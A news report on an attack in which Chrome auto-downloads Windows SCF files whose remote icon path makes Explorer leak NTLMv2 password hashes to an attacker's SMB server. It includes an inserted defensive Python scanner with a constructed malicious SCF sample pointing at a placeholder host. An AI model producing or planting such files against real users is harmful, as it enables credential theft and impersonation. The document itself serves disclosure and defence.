Attackers can use Google’s Chrome browser to install and automatically run a malicious file on a Windows PC to steal passwords.
DefenseCode security researcher Bosko Stankovic has detailed a credential theft attack on Windows that works by tricking a Chrome user into downloading a Windows Explorer Shell Command File or SCF (.scf), a format that’s been used since Windows 98 as a Show Desktop icon shortcut.
The SCF file can be used to trick Windows into an authentication attempt to an attacker-controlled remote SMB server, which is designed to capture the victim’s Microsoft LAN Manager (NTLMv2) password hash.
The hash can then be cracked offline or used to impersonate the victim on a service, such as Microsoft Exchange, that accepts the same kind of NTLM-based authentication.
The problem affects the latest Chrome running on the latest version of Windows 10.
“Currently, the attacker just needs to entice the victim, using fully updated Google Chrome and Windows, to visit his website to be able to proceed and reuse victim’s authentication credentials,” writes Stankovic.
“Even if the victim is not a privileged user, for example, an administrator, such a vulnerability could pose a significant threat to large organizations, as it enables the attacker to impersonate members of the organization.”
The attack relies on the way Chrome and Windows treat SCF files. The specific problem with Chrome is that it does not sanitize SCF files as it does with LNK files, which are given a .download extension. Chrome started sanitizing LNK files after the discovery that government hackers were abusing LNK files to infect Windows machines with Stuxnet.
Google told Kaspersky’s ThreatPost it is addressing this problem in Chrome. This affects Chrome for all versions of Windows, including Windows 10.
A second issue with Chrome is that it relies on Windows default behavior once the SCF file has been downloaded. As Stankovic points out, Chrome automatically downloads files that it deems safe.
This approach might be fine if the user needs to manually run the file, but in Windows the SCF file will trigger a request to authenticate to the attacker’s SMB server as soon as the download directory is opened in Windows File Explorer.
“There is no need to click or open the downloaded file — Windows File Explorer will automatically try to retrieve the ‘icon’,” notes Stankovic.
His tests of “several leading antivirus” found that none flagged the downloaded SCF files as dangerous.
“SCF file analysis would be easy to implement as it only requires inspection of the IconFile parameter considering there are no legitimate uses of SCF with remote icon locations,” he writes.
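A minimal check of the kind Stankovic describes, added here as an example (it is not code from the article or from DefenseCode): it parses an SCF file as the INI-style text it is and flags an IconFile value that points at a UNC path or URL rather than a local file. The two sample files and the 198.51.100.7 host are constructed for the demonstration.

```python
import configparser
import re
from pathlib import Path

# UNC paths (\\host\share\..., //host/share/...) and URL schemes (http://, file://, ...)
# all make Explorer fetch the icon from another host. The "\\?\UNC\..." long-path form
# starts with two backslashes, so it is covered as well.
REMOTE_ICON = re.compile(r"^\s*(\\\\|//|[a-z][a-z0-9+.-]*://)", re.IGNORECASE)

def icon_file(scf_text: str):
    """Return the IconFile value from any section of an SCF file, or None."""
    parser = configparser.RawConfigParser(strict=False, delimiters=("=",))
    parser.optionxform = str.lower  # INI keys are case-insensitive on Windows
    try:
        parser.read_string(scf_text.lstrip("\ufeff"))  # tolerate a UTF-8 BOM
    except configparser.Error:  # no section header, or otherwise unparsable
        return None
    for section in parser.sections():
        if parser.has_option(section, "iconfile"):
            return parser.get(section, "iconfile").strip()
    return None

def is_remote_icon(icon: str) -> bool:
    """True when resolving the icon location would make Explorer contact another host."""
    return bool(REMOTE_ICON.match(icon))

def scan_scf(scf_text: str) -> dict:
    """Classify one SCF file: suspicious when its IconFile is a remote location."""
    icon = icon_file(scf_text)
    return {"icon_file": icon, "suspicious": icon is not None and is_remote_icon(icon)}

def scan_downloads(directory: Path) -> list:
    """Return (path, IconFile) for every .scf under `directory` whose icon is remote."""
    hits = []
    for path in directory.rglob("*.scf"):
        result = scan_scf(path.read_text(encoding="utf-8", errors="replace"))
        if result["suspicious"]:
            hits.append((path, result["icon_file"]))
    return hits

# Constructed samples: the stock Show Desktop shortcut, and one whose icon lives on a
# placeholder remote host (198.51.100.7 is a documentation address, not a real server).
SHOW_DESKTOP_SCF = "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"
REMOTE_ICON_SCF = "[Shell]\r\nCommand=2\r\nIconFile=\\\\198.51.100.7\\share\\icon.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"

if __name__ == "__main__":
    for name, text in (("show-desktop", SHOW_DESKTOP_SCF), ("remote-icon", REMOTE_ICON_SCF)):
        print(name, scan_scf(text))
```

Pointing `scan_downloads` at a user's Downloads folder gives a quick triage list; because Explorer resolves the icon as soon as the folder is displayed, the check is most useful when run before that folder is opened, for example from a scheduled task or a download-completion hook.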
Chrome users can protect themselves by disabling automatic downloads. This can be done by opening Settings, selecting Show advanced settings, and then checking the option ‘Ask where to save each file before downloading’.
This step should significantly reduce the risk of NTLMv2 credential theft attacks using SCF files, according to Stankovic.
He also recommends restricting SMB traffic to private networks, and configuring the firewall to block the ports that can be used to connect to a malicious internet-based SMB server.